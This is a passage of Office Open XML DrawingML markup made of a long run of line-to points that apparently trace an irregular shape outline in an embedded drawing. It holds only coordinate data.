                    <a:lnTo>
                      <a:pt x="1666" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1665" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1667" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1668" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1664" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1661" y="847"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1658" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1658" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1657" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1657" y="848"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1655" y="847"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1653" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1653" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1651" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1649" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1644" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1642" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1643" y="855"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1638" y="853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1640" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1639" y="848"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1636" y="853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1634" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1631" y="862"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1629" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1627" y="864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1625" y="863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1626" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1623" y="863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1624" y="865"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1622" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1620" y="866"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1621" y="864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="866"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1613" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1611" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1607" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1607" y="890"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="891"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="890"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1610" y="890"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="891"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="892"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="893"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1603" y="896"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1603" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1605" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1607" y="899"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1611" y="906"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1612" y="909"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="910"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1620" y="908"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1619" y="906"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1618" y="906"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1617" y="903"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="903"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="902"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1617" y="902"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1619" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1620" y="907"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1621" y="911"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="914"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="910"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1608" y="910"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1607" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1605" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1604" y="915"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1603" y="915"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1601" y="915"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1600" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1602" y="909"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1599" y="910"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="909"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1597" y="911"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1596" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1586" y="919"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1574" y="920"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1565" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1560" y="927"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1559" y="929"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1557" y="929"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1556" y="931"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1558" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1558" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1557" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1555" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1554" y="931"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1551" y="934"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1553" y="937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1557" y="938"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1553" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1551" y="956"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1549" y="955"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1550" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1549" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1547" y="961"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1544" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1542" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1541" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1540" y="967"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1542" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1541" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1538" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1535" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1534" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1531" y="954"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1533" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1535" y="950"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1533" y="951"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1530" y="954"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1533" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1534" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1536" y="970"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1538" y="971"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1539" y="978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1539" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1537" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1533" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1530" y="995"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1530" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1530" y="997"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1529" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="1004"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="1004"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1528" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1529" y="990"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1530" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1529" y="987"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1528" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1527" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1523" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="981"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="975"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="970"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="970"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="971"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="969"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="967"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1523" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="955"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1523" y="955"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="957"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1523" y="957"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="957"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="961"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="975"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="981"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="986"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1511" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1510" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1510" y="981"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1507" y="978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1504" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1504" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1507" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1504" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1503" y="978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1504" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="981"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1509" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="986"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="987"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="989"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1517" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1510" y="987"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="997"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="1001"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="999"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1517" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="1001"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="997"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="1001"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1517" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="1004"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="1007"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1517" y="1007"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="1003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1511" y="1001"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1509" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1509" y="1003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="1004"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="1007"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="1010"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="1008"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="1013"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1528" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1532" y="1031"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1531" y="1030"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1529" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1528" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="1015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="1013"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="1015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="1015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="1017"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1523" y="1017"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="1020"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1527" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="1021"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="1021"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1523" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1517" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="1026"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="1021"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1523" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1523" y="1030"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1523" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="1031"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1528" y="1030"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1529" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1527" y="1035"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="1035"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1526" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="1040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="1039"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1517" y="1039"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="1036"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="1036"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1510" y="1037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1507" y="1036"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1509" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1510" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="1041"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="1042"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="1043"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="1043"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="1045"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="1046"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1511" y="1046"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1507" y="1043"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1509" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="1048"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1517" y="1045"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1517" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="1048"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="1050"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1516" y="1051"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="1052"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1504" y="1054"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1497" y="1061"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="1067"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1493" y="1068"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="1069"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="1070"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1478" y="1072"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="1077"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="1080"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1471" y="1083"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="1089"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1460" y="1092"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="1094"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1452" y="1095"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1449" y="1100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1448" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1442" y="1111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1440" y="1117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1437" y="1128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1438" y="1140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1441" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1444" y="1155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="1167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="1181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="1191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="1192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1459" y="1194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1459" y="1197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1460" y="1203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="1215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="1218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1455" y="1221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1456" y="1224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1456" y="1226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1453" y="1231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1453" y="1230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="1228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="1227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1452" y="1227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1449" y="1228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1447" y="1227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1443" y="1228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1442" y="1226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1443" y="1224"/>
                    </a:lnTo>
                    <a:lnTo>
